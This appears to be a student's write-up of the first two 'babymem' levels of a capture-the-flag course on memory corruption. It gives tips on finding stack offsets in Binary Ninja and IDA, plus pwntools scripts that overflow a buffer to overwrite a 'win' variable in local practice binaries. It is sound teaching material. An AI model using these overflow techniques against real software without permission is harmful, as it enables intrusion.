🚩babymem

Notes

Binary Ninja

Binja High Level IL has its own syntax. It is a C-like language, but you can't assume it is just C. I recommend reading the documentation to avoid confusion.

Binary Ninja vs. IDA

The course itself recommends binja, but I recommend IDA, period. You will know why after you work through all the challenges.

Renaming

A huge part of this chapter is finding offsets of different variables. If you would like to do it the static analysis way, renaming these variables would help a lot.

Remote vs. Local

If you download the binary to your local machine, the relative offsets inside the binary stay the same. That is, you can use whatever tools you want on your local machine to find those offsets. You don't have to do everything on the remote machine.

Level 1

Teaching Level

Level 1

Solution 1: Binja

To overwrite the win variable, first we need to figure out where the input buffer and the win variable locate in memory. In binja, I recommend the following workflow:

• Step 1: Read linear high level IL, find key variables and rename them. In this case, we look for buffer and win.

• Step 2: Switch to disassembly and look for renamed variables. Jot down their offsets.

Read the linear high level IL of the vuln() function and rename variables:

Linear High Level IL

Switch to disassembly and look for buffer and win:

Disassembly

Solution 2: IDA

In IDA, things are even easier. First we name the win variable:

Rename

The offset relative to rbp can be found in the variable declarations:

Offset

The downside is that IDA does not recognize all the function names, so I still recommend binja for this chapter.

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("/babymem_level1_testing1", checksec=False)

#--------ret2win--------#

offset = 0x20

payload_size = "33"
payload = flat(
        b"A" * offset,
        "B",
)

p = elf.process()

p.sendlineafter("Payload size: ", payload_size)
p.sendlineafter(f"Send your payload (up to {payload_size} bytes)!\n", payload)

p.interactive()

Level 2

Teaching Level

Level 2

Solution

The offsets are not easy to find for this level. Instead, we just spam enough A's so that the win variable on the stack is overwritten.

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("/babymem_level2_testing1", checksec=False)

#--------ret2win--------#

payload_size = "1024"
payload = flat(
        b"A" * 1024,
)

p = elf.process()

p.sendlineafter("Payload size: ", payload_size)
p.sendlineafter(f"Send your payload (up to {payload_size} bytes)!\n", payload)

p.interactive()